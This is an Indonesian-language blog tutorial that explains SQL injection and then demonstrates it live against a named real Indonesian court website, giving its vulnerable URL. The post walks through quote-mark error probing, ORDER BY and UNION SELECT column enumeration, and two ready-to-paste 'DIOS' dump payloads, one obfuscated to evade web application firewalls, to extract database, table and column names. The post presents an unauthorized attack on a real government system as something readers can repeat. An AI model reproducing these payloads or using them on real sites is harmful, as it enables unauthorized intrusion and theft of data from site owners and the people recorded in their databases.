Pengertian Sql Injection & Cara Melakukannya Pada Website

 

Hallo Sobat Dunia Cyber ! :D

Kembali lagi bersama saya , dan kali ini saya akan share Pengertian dari SQL-Injection & Cara Melakukan SQL-injection Pada Website :D

oke langsung saja,,

 Pengertian dari SQL-Injection adalah suatu teknik penyerangan dengan kode SQL yang berbahaya yang bisa memanipulasi database, dan kepanjangan dari SQL (Stuctured Query Language) ,dan tindakan ini termasuk dalam bidang Hacking,dimana penyerang dapat mencari celah kerentanan bug tsb dalam suatu website tersebut.. ( selebihnya kalian cari dan pahami sendiri arti dari SQL-I :D ).

Oke bagaimana cara nya untuk melakukan penyerangan SQL-I terhadap website ? 

Jangan khawatir , Tentu saja saya akan membahas & mempraktekan nya di Blog ini guys :v

Oke langsung saja karna saya punya target nya langsung eksekusi saja yaa hehe

Target : https://www.pn-baturaja.go.id/pnbta/?modul=profile&mode=lihat_pegawai2&idpegawai=29

dan disini saya menemukan parameter id itu di belakang webisite,, ketika saya menaruhkan string ' ( tanda petik ) dibelakang parameter id nya kemudian website tersebut nampak berbeda tampilan nya ( error ) yg dimana disebut Vulnerable SQL-INJECTION :D

lanjut,,

ketikan +order+by+1--+- dan kemudian website tersebut pulih seperti semula yg tadinya error menjadi tidak error 

kalian order+by+1 

( angka 1 bisa diganti dengan angka seterusnya sampai website tersebut error seperti yang tadi diberikan string ' )

jika sudah kalian ketikan union+select+1,2,3,4,5,6,7,8,9,10,11--+- dan muncul lah angka rahasia atau disebut angka togel :v

ketika muncul angka rahasianya kalian berikan DIOS SQL pada angka rahasia nya dan pastekan disitu

untuk dios nya kalian berikan ini :

MadBlood DIOS :

(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))

 ZEN with WAF DIOS:

(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)

dan masih bnyk lagi dios yg bisa dipakai untuk penyerangan SQL-I ini guys

dan setelah kalian berikan dios tersebut dan muncul lah nama nama table & column ta le,nama database website , user, version dll

contoh gambar

dan seperti itulah tampilan nyaa dan muncul nama database webiste , dll

hmm dan mungkin cukup sampai disini aja lah ya untuk materi kali ini mengenai penjelasan dari SQL-INJECTION dan Cara Melakukan SQL-Injection Pada Website

Oke mungkin ini aja pembahasan kali ini

mohon maaf jika kurang tidak jelas :v

Okay see u next time :D